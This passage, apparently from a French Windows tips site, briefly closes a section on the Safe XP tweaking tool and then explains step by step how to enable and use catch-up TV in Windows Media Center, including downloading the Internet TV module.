Ici aussi il y a une description des options en bas de la fenêtre du logiciel, à vous de voir ce que vous voulez appliquer. On notera également la présence d'un bouton "Paramètres conseillés" qui va vous aider dans votre choix en cochant pour vous les meilleures options.

Fonctionnement de Safe XP



Vous voilà maintenant avec un Windows plus léger et surtout plus sécurisé.

Regarder la TV en différé avec Windows Media Center

Il est possible de regarder la TV en différé avec Windows Media Center si vous possédez une connexion Internet haut-débit. Voyons ensemble comment faire.
La télé en différé propose différent extraits vidéos que vous pouvez regarder à la demande. Sont disponibles l'actualité sportive, des bandes annonces, des reportages ou encore des clips vidéo...

Pour pouvoir regarder la TV en différé, il suffit de lancer Windows Media Center et d'aller dans le menu TV. Si l'option TV en différé n'est pas présente, voici la marche à suivre pour l'obtenir :

Aller dans le menu Tâches puis choisissez paramètres.

Menu Tâches de Windows Media Center
Menu Tâches de Windows Media Center

Cliquez sur Général.

Option Général dans Windows Media Center
Option Général dans Windows Media Center

Sélectionnez Options de téléchargement automatique.

Options de téléchargement automatique
Options de téléchargement automatique

A ce niveau, vous pouvez, si vous le souhaitez, cochez la seconde case et renseigner un horaire de téléchargement (idéal pour programmer les téléchargements durant la nuit).

Télécharger les données de Windows Media Center
Téléchargement des données de Windows Media Center

Cliquez sur le bouton Télécharger.
Lorsque Windows Media Center vous averti que le téléchargement est terminé, fermer plus relancer le media center. L'option TV en différé est maintenant présente !

Option TV en différe
L'option TV en différé dans le menu TV

Lors du premier lancement, l'installation du module Internet TV sera nécessaire. Cochez la case et cliquer sur le bouton Installer.

Téléchargement de Internet TV
Téléchargement de Internet TV

Le téléchargement de Internet TV se lance. A noter que lorsque celui-ci sera terminé, vous pourrez être invité à installer ou mettre à jour Silverlight sur votre ordinateur.

Vous pouvez maintenant choisir votre programme...

Choix du programme différé
Choix du programme différé

...et le visionner :)

Visionnage du programme différé
Visionnage du programme différé

Petit bémol tout de même, il sera parfois nécessaire de regarder une publicité d'une trentaine de secondes avant de pouvoir visionner le programme choisi.